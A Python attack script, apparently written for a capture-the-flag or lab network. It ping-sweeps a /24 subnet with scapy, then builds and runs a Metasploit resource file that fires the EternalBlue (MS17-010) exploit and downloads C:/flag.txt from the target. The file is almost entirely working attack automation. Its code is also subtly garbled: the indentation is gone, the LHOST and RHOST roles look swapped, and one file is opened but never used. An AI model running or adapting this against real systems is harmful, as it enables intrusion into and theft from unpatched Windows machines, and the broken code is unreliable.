import os
import ipaddress
import queue
import socket
import threading
import random
from scapy.layers.inet import IP,ICMP,sr1
q = queue.Queue()
q2 = queue.Queue()
port = 1000
def get_ip(host):
ip = ipaddress.ip_network(host).hosts()
for i in ip:
q.put(str(i))
def host_Scanner():
while True:
if q.empty():
break
ip = q.get()
a = IP(dst=ip) / ICMP() / bytes(str([random.randint(0,255) for _ in range(10)]),encoding='utf-8')
b = sr1(a,verbose=False,timeout=3)
if b:
q2.put(ip)
def Handler(configFile,lhost,lport,rhost):
configFile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + str(lhost) + '\n')
configFile.write('set RHOST ' + str(rhost) + '\n')
configFile.write('exploit\n')
configFile.write('download C:/flag.txt ./' + '\n')
configFile.write('exit\n')
def main():
global port
if q2.empty():
return
configFile = open('ms17_010.rc', 'w')
lhost = q2.get()
lport = str(port)
rhost = '192.168.201.169'
Handler(configFile, lhost, lport, rhost)
configFile.close()
os.system('msfconsole -r ms17_010.rc')
print(f'[+] ip=>{lhost} is open ms17_010')
port += 5
if __name__ == '__main__':
file = open('ip.txt','w')
get_ip('192.168.201.0/24')
f = []
for i in range(50):
t = threading.Thread(target=host_Scanner)
t.start()
f.append(t)
for i in f:
i.join()
for i in range(2):
t = threading.Thread(target=main)
t.start()